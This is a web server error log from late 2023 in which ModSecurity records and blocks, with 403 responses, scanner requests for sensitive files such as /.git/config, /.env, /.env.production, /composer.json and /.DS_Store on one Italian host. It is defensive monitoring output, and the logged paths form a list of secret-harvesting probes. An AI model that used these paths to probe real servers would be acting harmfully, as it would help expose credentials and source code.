[Wed Sep 27 09:36:58.683991 2023] [:error] [pid 2054236] [client 31.42.184.71:47612] [client 31.42.184.71] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZRPbms3U7Qll5HpMOVrqmgAAAAI"]
[Sat Nov 11 08:17:50.679393 2023] [:error] [pid 3078224] [client 195.128.248.17:44010] [client 195.128.248.17] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZU8qnvfKyMjw_0-9_-jW9QAAAAI"]
[Sat Nov 11 08:17:50.730971 2023] [:error] [pid 3078224] [client 195.128.248.17:44010] [client 195.128.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZU8qnvfKyMjw_0-9_-jW9QAAAAI"]
[Sat Nov 11 08:17:50.732348 2023] [:error] [pid 3078224] [client 195.128.248.17:44010] [client 195.128.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZU8qnvfKyMjw_0-9_-jW9QAAAAI"]
[Thu Nov 23 03:13:51.339124 2023] [:error] [pid 3366374] [client 47.88.30.217:60384] [client 47.88.30.217] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/composer.json"] [unique_id "ZV61X2-fLP7ApPOsraD6ogAAAAE"]
[Thu Nov 23 03:13:51.376204 2023] [:error] [pid 3366374] [client 47.88.30.217:60384] [client 47.88.30.217] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/composer.json"] [unique_id "ZV61X2-fLP7ApPOsraD6ogAAAAE"]
[Thu Nov 23 03:13:51.376401 2023] [:error] [pid 3366374] [client 47.88.30.217:60384] [client 47.88.30.217] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/composer.json"] [unique_id "ZV61X2-fLP7ApPOsraD6ogAAAAE"]
[Thu Nov 23 03:17:16.857523 2023] [:error] [pid 3366375] [client 65.154.226.167:16961] [client 65.154.226.167] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/composer.json"] [unique_id "ZV62LJWAsSjUye8z8zo2dwAAAAI"], referer: http://economiasolidale.38121.it/composer.json
[Thu Nov 23 03:17:16.857915 2023] [:error] [pid 3366375] [client 65.154.226.167:16961] [client 65.154.226.167] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/composer.json"] [unique_id "ZV62LJWAsSjUye8z8zo2dwAAAAI"], referer: http://economiasolidale.38121.it/composer.json
[Thu Nov 23 03:17:16.858140 2023] [:error] [pid 3366375] [client 65.154.226.167:16961] [client 65.154.226.167] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/composer.json"] [unique_id "ZV62LJWAsSjUye8z8zo2dwAAAAI"], referer: http://economiasolidale.38121.it/composer.json
[Thu Nov 23 22:13:53.830616 2023] [authz_core:error] [pid 3384658] [client 159.89.83.196:37190] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Nov 23 22:13:55.625490 2023] [:error] [pid 3384686] [client 159.89.83.196:37436] [client 159.89.83.196] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZV_Ak-x7HMGgnAv1JNjihAAAAAE"]
[Thu Nov 23 22:13:55.625877 2023] [:error] [pid 3384686] [client 159.89.83.196:37436] [client 159.89.83.196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZV_Ak-x7HMGgnAv1JNjihAAAAAE"]
[Thu Nov 23 22:13:55.626127 2023] [:error] [pid 3384686] [client 159.89.83.196:37436] [client 159.89.83.196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZV_Ak-x7HMGgnAv1JNjihAAAAAE"]
[Thu Nov 23 22:13:55.955992 2023] [:error] [pid 3384687] [client 159.89.83.196:37506] [client 159.89.83.196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZV_Ak141edVTjqs38FoVEgAAAAY"]
[Thu Nov 23 22:13:55.956343 2023] [:error] [pid 3384687] [client 159.89.83.196:37506] [client 159.89.83.196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZV_Ak141edVTjqs38FoVEgAAAAY"]
[Thu Nov 23 22:13:55.956589 2023] [:error] [pid 3384687] [client 159.89.83.196:37506] [client 159.89.83.196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZV_Ak141edVTjqs38FoVEgAAAAY"]
[Thu Nov 23 22:13:56.294493 2023] [:error] [pid 3384662] [client 159.89.83.196:37562] [client 159.89.83.196] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZV_AlMFVnGnIgUHp6p-jZgAAAAU"]
[Thu Nov 23 22:13:56.294831 2023] [:error] [pid 3384662] [client 159.89.83.196:37562] [client 159.89.83.196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZV_AlMFVnGnIgUHp6p-jZgAAAAU"]
[Thu Nov 23 22:13:56.295040 2023] [:error] [pid 3384662] [client 159.89.83.196:37562] [client 159.89.83.196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZV_AlMFVnGnIgUHp6p-jZgAAAAU"]
[Thu Nov 23 22:13:58.258077 2023] [:error] [pid 3384686] [client 193.143.1.139:43126] [client 193.143.1.139] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZV_Alux7HMGgnAv1JNjihQAAAAE"]
[Thu Nov 23 22:13:58.258369 2023] [:error] [pid 3384686] [client 193.143.1.139:43126] [client 193.143.1.139] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZV_Alux7HMGgnAv1JNjihQAAAAE"]
[Thu Nov 23 22:13:58.258593 2023] [:error] [pid 3384686] [client 193.143.1.139:43126] [client 193.143.1.139] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZV_Alux7HMGgnAv1JNjihQAAAAE"]
[Thu Nov 23 22:13:59.696033 2023] [:error] [pid 3384658] [client 193.143.1.139:53778] [client 193.143.1.139] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZV_Al1g4D9UwPPgSmzHN4wAAAAA"]
[Thu Nov 23 22:13:59.699122 2023] [:error] [pid 3384658] [client 193.143.1.139:53778] [client 193.143.1.139] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZV_Al1g4D9UwPPgSmzHN4wAAAAA"]
[Thu Nov 23 22:13:59.699415 2023] [:error] [pid 3384658] [client 193.143.1.139:53778] [client 193.143.1.139] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZV_Al1g4D9UwPPgSmzHN4wAAAAA"]
[Thu Nov 30 07:09:31.443271 2023] [:error] [pid 3526813] [client 15.237.215.110:42918] [client 15.237.215.110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZWgnGzGvXQJpovX5YKEx9wAAAAU"]
[Thu Nov 30 07:09:31.444479 2023] [:error] [pid 3526813] [client 15.237.215.110:42918] [client 15.237.215.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZWgnGzGvXQJpovX5YKEx9wAAAAU"]
[Thu Nov 30 07:09:31.444666 2023] [:error] [pid 3526813] [client 15.237.215.110:42918] [client 15.237.215.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZWgnGzGvXQJpovX5YKEx9wAAAAU"]
[Thu Nov 30 13:28:38.187772 2023] [:error] [pid 3526810] [client 15.237.215.110:60088] [client 15.237.215.110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "ZWh_9gKdb-BcjEoUohFcngAAAAI"]
[Thu Nov 30 13:28:38.188017 2023] [:error] [pid 3526810] [client 15.237.215.110:60088] [client 15.237.215.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "ZWh_9gKdb-BcjEoUohFcngAAAAI"]
[Thu Nov 30 13:28:38.188183 2023] [:error] [pid 3526810] [client 15.237.215.110:60088] [client 15.237.215.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "ZWh_9gKdb-BcjEoUohFcngAAAAI"]
[Thu Nov 30 17:12:31.927159 2023] [:error] [pid 3526864] [client 15.237.215.110:59944] [client 15.237.215.110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZWi0b01twsPh32zYLyyHMQAAAAY"]
[Thu Nov 30 17:12:31.927415 2023] [:error] [pid 3526864] [client 15.237.215.110:59944] [client 15.237.215.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZWi0b01twsPh32zYLyyHMQAAAAY"]
[Thu Nov 30 17:12:31.927595 2023] [:error] [pid 3526864] [client 15.237.215.110:59944] [client 15.237.215.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "ZWi0b01twsPh32zYLyyHMQAAAAY"]
[Sat Dec 02 05:58:24.840739 2023] [:error] [pid 3570533] [client 31.220.0.86:39480] [client 31.220.0.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZWq5cF6dN7N1uZfNwd610QAAAAI"]
[Sat Dec 02 05:58:24.841131 2023] [:error] [pid 3570533] [client 31.220.0.86:39480] [client 31.220.0.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZWq5cF6dN7N1uZfNwd610QAAAAI"]
[Sat Dec 02 05:58:24.841337 2023] [:error] [pid 3570533] [client 31.220.0.86:39480] [client 31.220.0.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZWq5cF6dN7N1uZfNwd610QAAAAI"]
[Thu Dec 14 05:32:12.110414 2023] [:error] [pid 3850825] [client 110.138.91.210:53621] [client 110.138.91.210] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "ZXqFTKsH7kl-YZ7EQSefDgAAAAY"]
[Thu Dec 14 05:32:12.123987 2023] [:error] [pid 3850825] [client 110.138.91.210:53621] [client 110.138.91.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "ZXqFTKsH7kl-YZ7EQSefDgAAAAY"]
[Thu Dec 14 05:32:12.124189 2023] [:error] [pid 3850825] [client 110.138.91.210:53621] [client 110.138.91.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "ZXqFTKsH7kl-YZ7EQSefDgAAAAY"]
